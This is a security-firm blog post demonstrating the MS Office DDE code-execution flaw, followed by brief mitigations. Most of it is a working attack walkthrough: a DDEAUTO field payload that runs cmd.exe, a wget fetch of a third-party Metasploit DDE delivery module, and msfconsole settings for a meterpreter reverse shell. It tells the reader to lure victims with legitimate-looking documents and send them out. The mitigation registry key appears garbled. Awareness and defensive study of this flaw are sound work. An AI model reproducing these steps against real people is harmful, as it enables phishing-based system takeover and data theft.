MS-OFFICE DDE Code Execution Vulnerability

BEWARE OF MS-OFFICE DDE CODE EXECUTION VULNERABILITY

INTRODUCTION:

DDE (Dynamic Data Exchange) protocol is an inbuilt feature in Microsoft Windows Applications used for the exchange of dynamic data between the applications. DDE protocol sends messages between the applications that share data and uses shared memory to exchange data between applications.
There are many applications available which use DDE feature which includes MS-Word and office 365, visual basic etc..,

DDE VULNERABILITY AND CODE EXECUTION:

For Data transfer between the applications, DDE work by executing the application, that will provide the data. If an attacker can inject a malicious code inside the DDE object field of the application (In our example we use MS-word), the attacker can execute code within the word document or excel sheet. Another advantage for the attacker is, unlike other client-side code execution attacks that use a malicious doc file which when opened, prompts the victim to enable macros in order to run the malware, these DDE exploits don’t need the victim to enable macros feature in his ms-word application. When the malicious doc is opened, it simply throws an error dialog box to the victim, which most of the users will click ‘OK’ and they will ignore it. Hence there is a higher chance for the attackers to gain access to victim machine by using this vulnerability.

Since DDE is an inbuilt feature, the malicious document cannot be identified as a threat by any Anti-virus software or windows defender. This is another big advantage for the attacker and hackers.

In this article, we will look at a demo starting with a simple code execution example by using DDE vulnerability to a complete compromise of a victim system using Metasploit.

SIMPLE CODE EXECUTION IN MS-WORD:

In MS-Word (All versions are vulnerable), open a blank new document or we can use an existing document for legitimacy purpose which will be helpful for luring the victim to believe that the document is legitimate and trusted. For our example, I’m using a blank document.

In the blank document, go to insert tab → Quick parts → Field

Fig.1 Blank Document

In the Field dialog box, select Formula option to insert our DDE exploit code.

Fig.2 Insertion in Formula option

After that, you should see a Field inserted into the document with an error “!Unexpected End of Formula”, right-click the Field, and choose Toggle Field Codes. we need to craft a DDE Object payload in the text field, which will start the malware or any code of our choice when the document is opened.

Fig.3

In the text field, insert the following code for executing notepad.exe when the document is opened.

{DDEAUTO c:\\windows\\system32\\cmd.exe "/k notepad.exe"}

The DDEAUTO keyword is to inform Ms Word that this is a DDE field, and will auto execute when the document is opened, the second part is the full path of the executable to execute, and the last part between quotes are the arguments to pass to this executable (execute notepad.exe).

Fig.4

After that save the document as any name. Once the victim opens the doc, notepad.exe is executed after 2 error messages.

Fig.6

After these two errors, which most of the users will ignore, notepad gets executed without any macros.

Fig.7

In this way, an attacker can execute malicious code without any user interaction to take full system control.

SYSTEM COMPROMISE USING DDE EXPLOIT IN METASPLOIT:

Since the makers of Metasploit has not released the exploit in its update, we will get the exploit from outside and import it to Metasploit database. Download the exploit using command

wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb

After that just move the exploit dde_delivery.rb to use/share/Metasploit-framework/modules/exploit/windows directory. After that open msfconsole and reload the database using command reload_all.

After the exploit is loaded in Metasploit, we can use it to exploit our victim. In msfconsole set the below command parameters.

Use exploit/windows/dde_delivery
 set SRVHOST
 set payload windows/meterpreter/reverse_tcp
 set LHOST
 set LPORT
 exploit

Fig.8

Once we give the exploit command, it will generate a DDE exploit payload. We need to copy it paste it to the DDE formula field that is described in above example.

Fig.9

Save the document and send it to the victim. Once the victim opens the document and ignores the error, we will get the remote system access via meterpreter shell.

Fig.10

Once we get the shell, we can interact with sessions – I command.

Fig.11

In this way, attackers can compromise the system without any knowledge of users and also without triggering any alerts from the firewall. Microsoft has released some initial patches for this vulnerability.

MITIGATION FOR DDE VULNERABILITY:

1. Install windows security updates regularly.
2. Double the error messages while opening any msoffice documents instead of blindly clicking on OK button.
3. Do not open any unnecessary email attachments.
4. Use an up to date anti-virus and firewall software.
5. Disable DDE feature in windows registry by using the key

{HKEY_CURRENT_USER\Software\Microsoft\Office\\Excel\Security} workbooklinewarnings(DWORD)=2

Since DDE is a Microsoft’s genuine feature, most antivirus solutions do not flag any warning or block MS Office documents with DDE fields. The best way to protect yourself from such attacks is always to be suspicious of any uninvited document sent via an email and never click on links inside those documents unless adequately verifying the source.

RiskInfosec provides the world’s best security solutions. For Best Security Solutions reach us @ Contact@briskinfosec.com.

REFERENCES:

1) https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/
2) https://technet.microsoft.com/en-us/library/security/4053440.aspx

AUTHOR

Dawood Ansar

Security Engineer

BriskInfosec Technology and consulting  PVT LTD

FInd me @https://www.linkedin.com/in/dawood-ansar-29403213b/